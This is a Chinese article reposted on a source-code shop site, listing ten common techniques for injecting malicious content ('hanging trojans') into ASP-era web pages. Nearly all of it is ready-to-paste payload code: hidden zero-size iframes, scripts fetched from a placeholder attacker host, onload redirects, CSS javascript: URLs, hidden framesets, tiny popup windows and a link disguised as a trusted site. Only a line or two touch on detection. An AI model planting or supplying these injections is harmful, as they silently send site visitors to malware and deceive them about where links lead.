源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

Asp常见挂马方式大总结

  • 时间:2022-09-27 21:27 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:Asp常见挂马方式大总结
[b]一:框架挂马 [/b]<iframe src=地址 width=0 height=0></iframe> 其中“地址”处可以输入恶意网站链接等 [b]二:js文件挂马 [/b] 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。 [b]三:js变形加密[/b] <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后缀 [b]四:body挂马[/b] <body onload="window.location='地址';"></body> [b]五:隐蔽挂马[/b] top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'; [b]六:css中挂马[/b] body { background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 这种方式比较狠,也比较难发现。 [b]七:JAJA挂马[/b] <SCRIPT language=javascript> window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> [b]八:图片伪装 [/b] <html> <iframe src="网马地址" height=0 width=0></iframe> <img src="图片地址"></center> </html> [b]九:伪装调用[/b] <frameset rows="444,0" cols="*"> <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> [b]十:高级欺骗[/b] <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="网马地址"; open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT> 如何发现上面的行为,如果多个页面都有挂马代码,那么就需要批量替换工具,推荐大家使用 [img]http://files.jb51.net/upload/201108/20110830193843302.gif[/img] [url=http://s.jb51.net]编程素材网服务器频道[/url]有的下载(更多软件可以到s.jb51.net下载)
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部